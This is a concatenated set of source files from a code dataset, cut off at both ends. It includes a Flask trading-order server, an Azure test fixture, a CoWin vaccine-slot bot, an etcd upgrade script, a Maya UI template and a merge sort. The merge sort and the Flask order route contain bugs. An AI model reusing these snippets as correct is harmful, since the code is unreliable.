all_modules[tmp[\"ModuleCode\"]] = b\n return all_modules\n\n# Convert JSON to dictionary\n\n\n#Convert JSON to dictionary\ndef read_json(filename):\n datafile = open(filename, 'r', encoding='utf-8')\n return json.loads(datafile.read())\n","sub_path":"bot/nus_modules.py","file_name":"nus_modules.py","file_ext":"py","file_size_in_byte":3352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"250773150","text":"from flask import Flask\nfrom flask import request\nimport logging\nfrom common_defs import *\nfrom init_clients import exchanges_clients\n\napp = Flask(__name__)\n\n\ndef setup_logger():\n # Prints logger info to terminal\n logger = logging.getLogger()\n logger.setLevel(logging.DEBUG) # Change this to DEBUG if you want a lot more info\n ch = logging.StreamHandler()\n # create formatter\n formatter = logging.Formatter(\"%(asctime)s - %(name)s - %(levelname)s - %(message)s\")\n # add formatter to ch\n ch.setFormatter(formatter)\n logger.addHandler(ch)\n return logger\n\n\nlogger = setup_logger()\n\n\n@app.route('/')\ndef hello_world():\n return 'Hello World!'\n\n@app.route('/v1/instrument/compositeIndex')\n@app.route('/v1/instrument', methods=[\"GET\"])\ndef instrument():\n eid = request.args.get('eid', '')\n symbol = request.args.get('symbol', '')\n print(\"instrument\")\n res = exchanges_clients[eid].get_instrument(symbol)\n print(res)\n return \"ok\"\n\n\n@app.route('/v1/order/', methods=[\"POST\", \"GET\", \"DELETE\"])\ndef order(operation):\n\n if request.method == 'POST' and request.is_json:\n req = request.json\n if operation == \"place\":\n if \"clientOrderId\" in req and \"exchangeId\" in req and \"symbol\" in req and \"quantity\" in req:\n\n logger.debug(\"place request: %s\" % request.json)\n client = exchanges_clients[req[\"exchangeId\"]]\n res = client.place_order(req[\"clientOrderId\"], req[\"symbol\"], req[\"quantity\"], req[\"price\"], req[\"type\"])\n logger.debug(res)\n return RESPONSE_OF_SUCCESSFUL_OPERATION\n else:\n return RESPONSE_OF_BAD_REQUEST\n elif operation == \"query\":\n if \"clientOrderId\" in req and \"exchangeId\" in req and \"symbol\" in req:\n\n logger.debug(\"query request: %s\" % request.json)\n client = exchanges_clients[req[\"exchangeId\"]]\n res = client.query_order(req[\"clientOrderId\"], req[\"symbol\"])\n logger.debug(\"response: %s\" % res)\n return RESPONSE_OF_SUCCESSFUL_OPERATION\n else:\n return RESPONSE_OF_BAD_REQUEST\n pass\n elif operation == \"cancel\":\n pass\n\n else:\n return RESPONSE_OF_INVALID_OPERATION_TYPE\n elif request.method == \"GET\":\n args = request.args\n logger.debug(\"GET with args: %s\" % args)\n if operation == \"query\":\n if \"clientOrderId\" in args and \"exchangeId\" in args and \"symbol\" in args:\n\n logger.debug(\"query request: %s\" % request.json)\n client = exchanges_clients[args[\"exchangeId\"]]\n res = client.query_order(args[\"clientOrderId\"], args[\"symbol\"])\n logger.debug(\"response: %s\" % res)\n return RESPONSE_OF_SUCCESSFUL_OPERATION\n else:\n return RESPONSE_OF_BAD_REQUEST\n elif request.method == \"DELETE\":\n args = request.args\n logger.debug(\"DELETE with args: %s\" % args)\n if operation == \"query\":\n if \"clientOrderId\" in args and \"exchangeId\" in args and \"symbol\" in args:\n\n logger.debug(\"query request: %s\" % request.json)\n client = exchanges_clients[args[\"exchangeId\"]]\n res = client.cancel_order(args[\"clientOrderId\"], args[\"symbol\"])\n logger.debug(\"response: %s\" % res)\n return RESPONSE_OF_SUCCESSFUL_OPERATION\n else:\n return RESPONSE_OF_BAD_REQUEST\n\n\nif __name__ == '__main__':\n logger = setup_logger()\n app.run(host=\"0.0.0.0\")\n","sub_path":"data-server/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"370622000","text":"# ------------------------------------\n# Copyright (c) Microsoft Corporation.\n# Licensed under the MIT License.\n# ------------------------------------\nimport time\nimport hashlib\nimport os\n\ntry:\n from unittest.mock import Mock\nexcept ImportError: # python < 3.3\n from mock import Mock\n\nfrom azure.core.credentials import AccessToken\nfrom azure.identity import EnvironmentCredential\n\nfrom devtools_testutils import AzureMgmtPreparer\n\nfrom secrets_vault_client import VaultClient\n\n\nclass VaultClientPreparer(AzureMgmtPreparer):\n def __init__(\n self,\n enable_soft_delete=None,\n name_prefix=\"vault\",\n parameter_name=\"vault_client\",\n disable_recording=True,\n playback_fake_resource=None,\n client_kwargs=None,\n random_name_enabled=True\n ):\n super(VaultClientPreparer, self).__init__(\n name_prefix,\n 24,\n disable_recording=disable_recording,\n playback_fake_resource=playback_fake_resource,\n client_kwargs=client_kwargs,\n random_name_enabled=random_name_enabled\n )\n self.parameter_name = parameter_name\n\n def create_resource(self, name, **kwargs):\n client = self.create_vault_client(kwargs.get(\"vault_uri\"))\n return {self.parameter_name: client}\n\n def create_vault_client(self, vault_uri):\n if self.is_live:\n credential = EnvironmentCredential()\n else:\n credential = Mock(get_token=lambda _: AccessToken(\"fake-token\", 0))\n return VaultClient(vault_uri, credential, is_live=self.is_live, **self.client_kwargs)\n","sub_path":"sdk/keyvault/azure-keyvault-secrets/tests/secrets_preparer.py","file_name":"secrets_preparer.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"428830308","text":"from flask import Flask, request\nimport requests\nimport geopy\nimport re\n# import geopy.distance\nfrom geopy.geocoders import Nominatim\nimport json\nfrom datetime import datetime\nimport constants\nfrom twilio.twiml.messaging_response import MessagingResponse\n\n# Create Flask app instance\napp = Flask(__name__)\n\n# Create geolocator object as an instance of geopy's Nominatim class\ngeolocator = Nominatim(user_agent=\"covid-bot\", timeout=5)\n\n# Base API URL\nbase_url = 'https://cdn-api.co-vin.in/api'\n\n\n# Create the API route\n@app.route('/bot', methods=['POST'])\ndef bot():\n # import ipdb;ipdb.set_trace()\n # Get the incoming message request data\n incoming_values = request.values\n print(\"Incoming Values:\\n\", incoming_values)\n\n # Get Geolocation sent by user\n latitude = incoming_values.get('Latitude', '')\n longitude = incoming_values.get('Longitude', '')\n\n # geopy geolocator API expects coordinates as a single comma separated string of latitude and longitude\n geo_coordinates_string = \", \".join((latitude, longitude))\n\n # Get the incoming message from incoming_values\n incoming_msg = incoming_values.get('Body', '').lower()\n\n\n if incoming_msg in constants.greeting_tokens:\n # return greeting message\n return as_twilio_response(constants.welcome_message)\n\n if 'help' in incoming_msg:\n # return help message\n return as_twilio_response(constants.help_message)\n\n if latitude:\n # Get the address dict from the geolocation data sent\n geo_location_dict = get_reverse_geocode(geo_coordinates_string)\n # pincode = geo_location_dict.get('postcode', '')\n # print('Pincode:', pincode)\n\n date_now = datetime.today().strftime('%d-%m-%Y')\n print(\"Today's Date:\", date_now)\n\n \n # appointment_response = get_appointment_response_by_pincode(appointment_api)\n \n location_response = get_location_message(geo_location_dict, date_now)\n return as_twilio_response(location_response)\n\n m = re.match(r\"^\\d+$\", incoming_msg)\n if m:\n date_now = datetime.today().strftime('%d-%m-%Y')\n return as_twilio_response(get_by_pincode(m.string, date_now))\n \n\n return as_twilio_response('Could not understand your message. Please type \"help\".')\n\n\n# helper functions\ndef as_twilio_response(message: str) -> str:\n resp = MessagingResponse()\n msg = resp.message()\n msg.body(message)\n return str(resp)\n\ndef get_response(url):\n response = requests.get(url, headers={'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0'})\n return response.json()\n\n\n# Get the address dict\ndef get_reverse_geocode(coordinates):\n location = geolocator.reverse(coordinates, exactly_one=True)\n address_dict = location.raw['address']\n print(\"Address Dict:\", address_dict)\n return address_dict\n\n\n# def get_appointment_response_by_pincode(appointment_api):\n# appointment_api = base_url + '/v2/appointment/sessions/public/findByPin?pincode={pincode}&date={date_now}'\n\n# appointment_data = get_response(appointment_api)\n# return appointment_data\n\n\ndef get_by_pincode(pincode, date_now):\n appointment_api_by_pin = base_url + '/v2/appointment/sessions/public/findByPin?pincode={pincode}&date={date_now}'.format(pincode=pincode, date_now=date_now)\n appointment_data = get_response(appointment_api_by_pin)\n\n appointment_response = f'''\n '''\n sessions = appointment_data.get(\"sessions\", [])\n if sessions:\n for idx, each in enumerate(sessions):\n # Print the name, address, district\n serial_number = idx + 1\n name = each.get(\"name\", \"\")\n address = each.get(\"address\", \"\")\n district = each.get(\"district_name\", \"\")\n from_time = each.get(\"from\", \"\")\n to_time = each.get(\"to\", \"\")\n fee_type = each.get(\"fee_type\", \"\")\n fee = each.get(\"fee\", 0)\n available_capacity = each.get(\"available_capacity\", 0)\n min_age_limit = each.get(\"min_age_limit\", 18)\n vaccine = each.get(\"vaccine\", \"\")\n\n each_response = f'''\n {serial_number}. {name}\n {address}, {district}\n Vaccine: {vaccine}, {fee_type}\n Available: {available_capacity} \n '''\n appointment_response += each_response\n else:\n appointment_response = \"0\"\n \n location_message = f'''\nYour location pincode is {pincode}.\n\nAvailable vaccine slots today: {appointment_response}\n\nVisit www.cowin.gov.in to book your vaccination\n'''\n return location_message\n\ndef get_location_message(geo_location_dict, date_now):\n # TODO: Add complete address to show in Location response\n # or add entire address, but remove 'country_code': 'in'\n # village = geo_location_dict.get('village', '')\n # city = geo_location_dict.get('city', '')\n # county = geo_location_dict.get('county', '')\n\n pincode = geo_location_dict.get('postcode', '')\n \n # states_api = base_url + '/v2/admin/location/states'\n # states_data = get_response(states_api)\n # print(states_data)\n\n return get_by_pincode(pincode, date_now)\n\n\n\nif __name__ == '__main__':\n app.run()\n\n# Get states and districts\n# base_api = 'https://cdn-api.co-vin/api'\n# # API to get all the states in India.\n# states_api = base_api + '/v2/admin/location/states'\n# states_data = get_response(states_api)\n# print(states_data)\n\n# API to get districts for a given state\n# district_api = base_api + '/v2/admin/location/districts/{state_id}'\n# district_data_per_state = get_response(district_api)\n\n# Checkout https://apisetu.gov.in/public/marketplace/api/cowin#/ for the CoWin Public API","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"41556841","text":"# Copyright 2020 Michael Still\n\nimport ipaddress\nimport json\nimport time\n\nfrom shakenfist import baseobject\nfrom shakenfist.baseobject import DatabaseBackedObject as dbo\nfrom shakenfist import etcd\nfrom shakenfist import instance\nfrom shakenfist import networkinterface\nfrom shakenfist.node import Node\nfrom shakenfist.util import process as util_process\n\n# Very simple data upgrader\n\n\ndef clean_events_mesh_operations(etcd_client):\n # TODO(andy): This can be removed when older releases do not exist\n\n # We probably need to cleanup excess network mesh events. We also need to\n # try and fetch small batches because of limits in the amount of data etcd3\n # can return at one time.\n\n # Save time and use the already available etcdctl client.\n net_keys, stderr = util_process.execute(None,\n 'etcdctl get --prefix /sf/event/network/ | grep sf/event',\n check_exit_code=[0, 1])\n if stderr:\n print('ERROR: Unable to retrieve network keys:%s' % stderr)\n return\n\n # Split network events into networks\n network_events = {}\n for key in net_keys.split('\\n'):\n if not key:\n continue\n _blank, _sf, _event, _network, uuid, _time = key.split('/')\n network_events.setdefault(uuid, []).append(key)\n\n # Delete all but last 50 events\n count = 0\n for keys in network_events.values():\n for k in keys[:-50]:\n print('--> Removing verbose network event %s' % k)\n etcd_client.delete(k)\n count += 1\n print(' - Cleaned up %d old network mesh events' % count)\n\n\ndef main():\n etcd_client = etcd.WrappedEtcdClient()\n\n releases = {}\n old_style_nodes = []\n\n for data, _ in etcd_client.get_prefix('/sf/node/'):\n n = json.loads(data.decode('utf-8'))\n\n observed = etcd_client.get(\n '/sf/attribute/node/%s/observed' % n['fqdn'])\n if observed:\n # New style node\n observed = json.loads(observed[0].decode('utf-8'))\n release = observed['release']\n else:\n # Old style node\n release = n.get('version', 'unknown')\n old_style_nodes.append(n['fqdn'])\n\n releases.setdefault(release, 0)\n releases[release] += 1\n\n print('Deployed releases:')\n for release in sorted(releases):\n print(' - %s: %s' % (release, releases[release]))\n print()\n\n min_release = None\n if not releases:\n min_release = '0.2'\n elif 'unknown' in releases:\n min_release = '0.2'\n else:\n min_release = sorted(releases)[0]\n print('Minimum release is %s' % min_release)\n\n elems = min_release.split('.')\n major = int(elems[0])\n minor = int(elems[1])\n\n if major == 0:\n if minor <= 4:\n # Upgrade networkinterfaces to the new attribute style\n for data, metadata in etcd_client.get_prefix('/sf/networkinterface/'):\n ni = json.loads(data.decode('utf-8'))\n if int(ni.get('version', 0)) < 2:\n etcd_client.put(\n '/sf/attribute/image/%s/floating' % ni['uuid'],\n json.dumps({'floating_address': ni.get('floating')},\n indent=4, sort_keys=True))\n if 'floating' in ni:\n del ni['floating']\n\n etcd_client.put(\n '/sf/attribute/image/%s/state' % ni['uuid'],\n json.dumps({\n 'state': ni['state'],\n 'state_updated': ni['state_updated']\n }, indent=4, sort_keys=True))\n del ni['state']\n del ni['state_updated']\n\n ni['version'] = 2\n etcd_client.put(\n metadata['key'], json.dumps(ni, indent=4, sort_keys=True))\n print('--> Upgraded networkinterface %s to version 2'\n % ni['uuid'])\n\n # Upgrade ipmanagers to v2, deleting strays while we're at it\n for data, metadata in etcd_client.get_prefix('/sf/ipmanager/'):\n network_uuid = metadata['key'].decode('utf-8').split('/')[-1]\n\n if not etcd_client.get('/sf/network/%s' % network_uuid):\n print('--> Deleted stray ipmanager %s' % network_uuid)\n etcd_client.delete(metadata['key'])\n continue\n\n ipm = json.loads(data.decode('utf-8'))\n if 'ipmanager.v1' in ipm:\n ipm['ipmanager.v2'] = {\n 'ipblock': ipm['ipmanager.v1']['ipblock'],\n 'in_use': {},\n 'uuid': network_uuid\n }\n for elem in ipm['ipmanager.v1']['in_use']:\n ipm['ipmanager.v2']['in_use'][elem] = ('unknown', None)\n\n del ipm['ipmanager.v1']\n\n if ipm['ipmanager.v2']['uuid'] == 'floating':\n ipblock_obj = ipaddress.ip_network(ipm['ipmanager.v2']['ipblock'],\n strict=False)\n for addr in [str(ipblock_obj[0]),\n str(ipblock_obj[1]),\n str(ipblock_obj.broadcast_address),\n str(ipblock_obj.network_address)]:\n ipm['ipmanager.v2']['in_use'][addr] = (\n 'ipmanager', network_uuid)\n\n etcd_client.put(\n metadata['key'], json.dumps(ipm, indent=4, sort_keys=True))\n print('--> Upgraded ipmanager %s to version 2' % network_uuid)\n\n # Bump instance version to support UEFI\n for data, metadata in etcd_client.get_prefix('/sf/instance/'):\n i = json.loads(data.decode('utf-8'))\n if i['version'] == 2:\n i['uefi'] = False\n i['version'] = 3\n etcd_client.put(\n metadata['key'], json.dumps(i, indent=4, sort_keys=True))\n\n clean_events_mesh_operations(etcd_client)\n\n if minor <= 3:\n # Upgrade instances to the new attribute style (this needs to\n # happen before we upgrade networks below).\n for data, _ in etcd_client.get_prefix('/sf/instance/'):\n inst = json.loads(data.decode('utf-8'))\n if int(inst.get('version', 0)) < 2:\n data = {}\n for attr in ['node', 'placement_attempts']:\n if inst.get(attr):\n data[attr] = inst[attr]\n del inst[attr]\n etcd_client.put(\n '/sf/attribute/instance/%s/placement' % inst['uuid'],\n json.dumps(data, indent=4, sort_keys=True))\n\n if 'enforced_deletes' in inst:\n data = {'count': inst.get('enforced_deletes', 0)}\n del inst['enforced_deletes']\n etcd_client.put(\n '/sf/attribute/instance/%s/enforce_deletes' % inst['uuid'],\n json.dumps(data, indent=4, sort_keys=True))\n\n if 'block_devices' in inst:\n data = {'block_devices': inst.get(\n 'block_devices', 0)}\n del inst['block_devices']\n etcd_client.put(\n '/sf/attribute/instance/%s/block_devices' % inst['uuid'],\n json.dumps(data, indent=4, sort_keys=True))\n\n state = baseobject.State(inst.get('state'),\n inst.get('state_updated'))\n for attr in ['state', 'state_updated']:\n inst.pop(attr, None)\n etcd_client.put(\n '/sf/attribute/instance/%s/state' % inst['uuid'],\n json.dumps(state.obj_dict(), indent=4, sort_keys=True))\n\n err_msg = inst.get('error_message')\n if err_msg:\n inst.pop('error_message', None)\n etcd_client.put(\n '/sf/attribute/instance/%s/error' % inst['uuid'],\n json.dumps({'message': err_msg},\n indent=4, sort_keys=True))\n\n data = {}\n for attr in ['power_state', 'power_state_previous',\n 'power_state_updated']:\n if inst.get(attr):\n data[attr] = inst[attr]\n del inst[attr]\n etcd_client.put(\n '/sf/attribute/instance/%s/power_state' % inst['uuid'],\n json.dumps(data, indent=4, sort_keys=True))\n\n data = {}\n for attr in ['console_port', 'vdi_port']:\n if inst.get(attr):\n data[attr] = inst[attr]\n del inst[attr]\n etcd_client.put(\n '/sf/attribute/instance/%s/ports' % inst['uuid'],\n json.dumps(data, indent=4, sort_keys=True))\n\n # These fields were set in code to v0.3.3, but never used\n for key in ['node_history', 'requested_placement']:\n if key in inst:\n del inst[key]\n\n inst['version'] = 2\n etcd_client.put(\n '/sf/instance/%s' % inst['uuid'],\n json.dumps(inst, indent=4, sort_keys=True))\n print('--> Upgraded instance %s to version 2'\n % inst['uuid'])\n\n # Upgrade images to the new attribute style\n for data, metadata in etcd_client.get_prefix('/sf/image/'):\n image_node = '/'.join(\n metadata['key'].decode('utf-8').split('/')[-2:])\n image = json.loads(data.decode('utf-8'))\n if int(image.get('version', 0)) < 2:\n data = {}\n RENAMES = {\n 'fetched': 'fetched_at',\n 'file_version': 'sequence'\n }\n for attr in ['size', 'modified', 'fetched', 'file_version']:\n if image.get(attr):\n data[RENAMES.get(attr, attr)] = image[attr]\n del image[attr]\n etcd_client.put(\n ('/sf/attribute/image/%s/download_%d'\n % (image_node, image.get('sequence', 0))),\n json.dumps(data, indent=4, sort_keys=True))\n\n if image.get('checksum'):\n etcd_client.put(\n '/sf/attribute/image/%s/latest_checksum' % image_node,\n json.dumps({'checksum': image.get('checksum')},\n indent=4, sort_keys=True))\n del image['checksum']\n\n etcd_client.put(\n '/sf/attribute/image/%s/state' % image_node,\n json.dumps({\n 'state': dbo.STATE_CREATED,\n 'state_updated': time.time()\n }, indent=4, sort_keys=True))\n\n new = baseobject.State(dbo.STATE_CREATED, time.time())\n etcd_client.put(\n '/sf/attribute/image/%s/state' % image_node,\n json.dumps(new.obj_dict(), indent=4, sort_keys=True))\n\n image['uuid'] = image_node\n image['ref'], image['node'] = image_node.split('/')\n image['version'] = 2\n etcd_client.put(metadata['key'],\n json.dumps(image, indent=4, sort_keys=True))\n print('--> Upgraded image %s to version 2' % image_node)\n\n # Find invalid networks\n for data, _ in etcd_client.get_prefix('/sf/network/'):\n n = json.loads(data.decode('utf-8'))\n bad = False\n try:\n netblock = ipaddress.ip_network(n['netblock'])\n if netblock.num_addresses < 8:\n bad = True\n except ValueError:\n bad = True\n\n if bad:\n for ni in networkinterface.interfaces_for_network(n):\n inst = instance.Instance.from_db(ni.instance_uuid)\n if inst:\n inst.enqueue_delete_due_error(\n 'Instance was on invalid network at upgrade.')\n else:\n print('--> Instance %s on invalid network, does '\n 'not exist in DB' % ni.instance_uuid)\n\n # NOTE(mikal): we have to hard delete this network here, or\n # it will cause a crash later in the Networks iterator.\n etcd_client.delete('/sf/network/%s' % n['uuid'])\n etcd_client.delete(\n '/sf/attribute/network/%s/state' % n['uuid'])\n print('--> Deleted invalid network %s (netblock too small)'\n % n['uuid'])\n continue\n\n # Upgrade networks to the new attribute style\n network = json.loads(data.decode('utf-8'))\n if int(network.get('version', 0)) < 2:\n data = {}\n for attr in ['state', 'state_updated', 'error_message']:\n if network.get(attr):\n data[attr] = network[attr]\n del network[attr]\n etcd_client.put(\n '/sf/attribute/network/%s/state' % network['uuid'],\n json.dumps(data, indent=4, sort_keys=True))\n\n if 'floating_gateway' in network:\n etcd_client.put(\n '/sf/attribute/network/%s/routing' % network['uuid'],\n json.dumps({'floating_gateway': network['floating_gateway']},\n indent=4, sort_keys=True))\n del network['floating_gateway']\n\n new = baseobject.State(dbo.STATE_CREATED, time.time())\n etcd_client.put(\n '/sf/attribute/network/%s/state' % n['uuid'],\n json.dumps(new.obj_dict(), indent=4, sort_keys=True))\n\n network['version'] = 2\n etcd_client.put(\n '/sf/network/%s' % network['uuid'],\n json.dumps(network, indent=4, sort_keys=True))\n print('--> Upgraded network %s to version 2'\n % network['uuid'])\n\n if minor <= 4:\n for old_name in old_style_nodes:\n # We do not observe() the new node, or set its release,\n # because we might not be running on that node and might\n # get the details wrong. Let the node do that thing.\n data = etcd_client.get('/sf/node/%s' % old_name)\n old_node = json.loads(data[0].decode('utf-8'))\n etcd_client.delete('/sf/node/%s' % old_name)\n\n n = Node.new(old_node['fqdn'], old_node['ip'])\n n._db_set_attribute('observed', {\n 'at': old_node['lastseen'],\n 'release': old_node['version']\n })\n print('--> Upgraded node %s to version 2' % old_name)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"shakenfist/client/upgrade.py","file_name":"upgrade.py","file_ext":"py","file_size_in_byte":16211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"572849263","text":"from algorithms.simulation import simulate\n\ndef run(base_grid, methods, variances, images = 1, output = True, iterations = 50):\n data = {}\n for method in methods:\n if output:\n print(\"variance test ({0})\".format(method))\n A = []\n for variance in variances:\n if output:\n print(\"variance = {0:.6f}\".format(variance))\n result = simulate(base_grid, method = method, images = images, variance = variance, iterations = iterations)\n A.append([variance] + result)\n data[method] = A\n return data\n","sub_path":"experiments/variances.py","file_name":"variances.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"16452512","text":"#Danielle SHwed\n#1310566\n#second question: journey.py\n\nclass Journey:\n \n\tdef __init__(self):\n\t\t#initialize odometer to 0 and two lists to empty\n\t\tself.odometer = 0\n\t\tself.leg_miles = []\n\t\tself.leg_gas = []\n\n\tdef setOdo(self, odoVal):\n\t\t#set odometer value\n\t\tself.odometer = odoVal\n\n\t\treturn self.odometer \n\n\tdef addLeg(self, milage, gasQuant):\n\t\t#append values to list\n\t\tself.leg_miles.append(milage)\n\t\tself.leg_gas.append(gasQuant)\n\n\tdef getLists(self):\n\t\treturn self.leg_miles, self.leg_gas\n\ndef main():\n\t#initialize variables\n\tcont = True\n\tmileTotal = 0\n\tgasTotal = 0\n\tperLitre = 0\n\tmyJourney = Journey()\n\n\tprint(\"when your journey is over simply press enter\")\n\n\t#while journey is still going\n\twhile cont == True:\n\n\t\tmiles = input(\"What is the milage for the next leg of the journey?: \")\n\t\t#if user just pressed enter, then stop looping\n\t\tif miles == \"\":\n\t\t\tcont = False\n\n\t\telse:\n\t\t\t#if miles is a int, then ask for gas then add another lef to the hourney\n\t\t\tgas = eval(input(\"What is the gas value for the next leg of the journey?: \"))\n\n\t\t\tmyJourney.addLeg(miles, gas)\t\n\n\tmileList, gasList = myJourney.getLists()\n\n\t#add up the journey\n\tfor i in mileList:\n\t\tmileTotal = mileTotal + int(i)\n\n\tfor i in gasList:\n\t\tgasTotal = gasTotal + int(i)\n\n\t#calculate miles/ L\n\tperLitre = mileTotal / gasTotal\n\n\tprint(\"Miles per litre for the trip: \"+ str(perLitre))\n\nmain()\n\n","sub_path":"journey.py","file_name":"journey.py","file_ext":"py","file_size_in_byte":1364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"217478807","text":"#!/usr/bin/env python\n# encoding: utf-8\n\"\"\"\nwindowTemplate.py\n\nCreated by Godfrey Huang on 2012-02-12.\nCopyright (c) 2012 Jean's Studios. All rights reserved.\n\"\"\"\nimport maya.cmds as cmds\n\nclass templateWindow(object):\n \"\"\"A base class for an options window\"\"\"\n\n @classmethod\n def showUI(cls):\n \"\"\"A function to instantiate the options window\"\"\"\n win = cls()\n win.create()\n return win\n\n '''\n @staticmethod\n def showUI():\n win = templateWindow()\n win.create()\n # return win\n '''\n def __init__(self):\n \"\"\"Initialize common data attributes\"\"\"\n ## unique window handle\n self.uiContent = {\n 'window' : 'ar_optionsWindow',\n 'title' : 'Options Window',\n 'size' : (546,350),\n 'supportsToolAction' : False,\n 'actionName': 'Apply and Close',\n }\n\n def create(self):\n \"\"\"Draw the window\"\"\"\n # delete the window if its handle exists\n if cmds.window(self.uiContent['window'], exists=True):\n cmds.deleteUI(self.uiContent['window'], window=True)\n # initialize the window\n self.uiContent['window'] = cmds.window(\n self.uiContent['window'],\n title=self.uiContent['title'],\n # widthHeight=self.uiContent['size'],\n menuBar=True\n )\n # main form for the window\n self.uiContent['mainForm'] = cmds.formLayout(\n nd=100,\n parent=self.uiContent['window'],\n )\n # create common menu items and buttons\n self.commonMenu()\n\n # see getOptionBox.mel for why we implement this layout pattern to emulate Maya's option boxes\n self.uiContent['optionsBorder'] = cmds.tabLayout(\n parent=self.uiContent['mainForm'],\n scrollable=True,\n tabsVisible=False,\n height=1,\n childResizable=True\n )\n # form to attach controls in displayOptions()\n self.uiContent['optionsForm'] = cmds.formLayout(\n nd=100,\n parent=self.uiContent['optionsBorder'],\n )\n self.displayOptions()\n # self.commonButtons()\n\n cmds.formLayout(\n self.uiContent['mainForm'], e=True,\n attachForm=(\n [self.uiContent['optionsBorder'],'top',0],\n [self.uiContent['optionsBorder'],'left',2],\n [self.uiContent['optionsBorder'],'right',2],\n \t\t\t\t[self.uiContent['optionsBorder'],'bottom',0], \n )\n )\n\n # show the window\n cmds.showWindow()\n \n def commonMenu(self):\n \"\"\"Create common menu items for all option boxes\"\"\"\n self.uiContent['editMenu'] = cmds.menu(label='Edit')\n self.uiContent['editMenuSave'] = cmds.menuItem(\n label='Save Settings',\n command=self.editMenuSaveCmd\n )\n self.uiContent['editMenuReset'] = cmds.menuItem(\n label='Reset Settings',\n command=self.editMenuResetCmd\n )\n self.uiContent['editMenuDiv'] = cmds.menuItem(d=True)\n self.uiContent['editMenuRadio'] = cmds.radioMenuItemCollection()\n self.uiContent['editMenuTool'] = cmds.menuItem(\n label='As Tool',\n radioButton=True,\n enable=self.uiContent['supportsToolAction'],\n command=self.editMenuToolCmd\n )\n self.uiContent['editMenuAction'] = cmds.menuItem(\n label='As Action',\n radioButton=True,\n enable=self.uiContent['supportsToolAction'],\n command=self.editMenuActionCmd\n )\n self.uiContent['helpMenu'] = cmds.menu(label='Help')\n self.uiContent['helpMenuItem'] = cmds.menuItem(\n label='Help on %s'%self.uiContent['title'],\n command=self.helpMenuCmd\n )\n def helpMenuCmd(self, *args):\n \"\"\"Override this method to display custom help\"\"\"\n cmds.launch(web='http://weibo.com/jeanim')\n def editMenuSaveCmd(self, *args):\n \"\"\"Override this method to implement Save Settings\"\"\"\n pass\n def editMenuResetCmd(self, *args):\n \"\"\"Override this method to implement Reset Settings\"\"\"\n pass\n def editMenuToolCmd(self, *args):\n \"\"\"Override this method to implement tool mode\"\"\"\n pass\n def editMenuActionCmd(self, *args):\n \"\"\"Override this method to implement action mode\"\"\"\n pass\n def actionBtnCmd(self, *args):\n \"\"\"Apply actions and close window\"\"\"\n self.applyBtnCmd()\n self.closeBtnCmd()\n def applyBtnCmd(self, *args):\n \"\"\"Override this method to apply actions\"\"\"\n pass\n def closeBtnCmd(self, *args):\n \"\"\"Close window\"\"\"\n cmds.deleteUI(self.uiContent['window'], window=True)\n def commonButtons(self):\n \"\"\"Create common buttons for all option boxes\"\"\"\n self.uiContent['commonBtnSize'] = ((self.uiContent['size'][0]-18)/3, 26)\n self.uiContent['actionBtn'] = cmds.button(\n parent=self.uiContent['mainForm'],\n label=self.uiContent['actionName'],\n height=self.uiContent['commonBtnSize'][1],\n command=self.actionBtnCmd\n )\n self.uiContent['applyBtn'] = cmds.button(\n parent=self.uiContent['mainForm'], \n label='Apply',\n height=self.uiContent['commonBtnSize'][1],\n command=self.applyBtnCmd\n )\n self.uiContent['closeBtn'] = cmds.button(\n parent=self.uiContent['mainForm'],\n label='Close',\n height=self.uiContent['commonBtnSize'][1],\n command=self.closeBtnCmd\n )\n cmds.formLayout(\n self.uiContent['mainForm'], e=True,\n attachForm=(\n [self.uiContent['actionBtn'],'left',5],\n [self.uiContent['actionBtn'],'bottom',5],\n [self.uiContent['applyBtn'],'bottom',5],\n [self.uiContent['closeBtn'],'bottom',5],\n [self.uiContent['closeBtn'],'right',5]\n ),\n attachPosition=(\n [self.uiContent['actionBtn'],'right',1,33],\n [self.uiContent['closeBtn'],'left',0,67]\n ),\n attachControl=(\n [self.uiContent['applyBtn'],'left',4,self.uiContent['actionBtn']],\n [self.uiContent['applyBtn'],'right',4,self.uiContent['closeBtn']]\n ),\n attachNone=(\n [self.uiContent['actionBtn'],'top'],\n [self.uiContent['applyBtn'],'top'],\n [self.uiContent['closeBtn'],'top']\n )\n )\n def displayOptions(self):\n \"\"\"Override this method to display options controls\"\"\"\n pass\n\nif __name__ == '__main__':\n testWindow = templateWindow()\n testWindow.create()\n\n","sub_path":"HTKG_script/Mel/UI/template.py","file_name":"template.py","file_ext":"py","file_size_in_byte":6892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"114554985","text":"\"\"\"\nMerge sort algorithm\n\nTime: O(nlogn) worst and average\nSpace: O(n)\n\"\"\"\ndef merge(arr, left, mid, right):\n \"\"\"\n Copy array elements into temporary array, so that sorted elements can\n be directly merged back into original array.\n \"\"\"\n temp = [0] * (right - left + 1)\n for k in range(left, right):\n temp[k] = arr[k]\n\n i = left\n j = mid + 1\n k = left\n\n while i <= mid and j <= right:\n if temp[i] < temp[j]:\n arr[k] = temp[i]\n i += 1\n else:\n arr[k] = temp[j]\n j += 1\n k += 1\n\n # No need to copy j -> right as its already\n # in the original array in its position\n for i in range(i, mid + 1):\n arr[k] = temp[i]\n k += 1\n\n return arr\n\ndef merge_sort(arr):\n def merge_sort_helper(arr, left, right):\n if left < right:\n # find the division point, partition based on position\n mid = left + (right-left)//2\n merge_sort_helper(arr, left, mid)\n merge_sort_helper(arr, 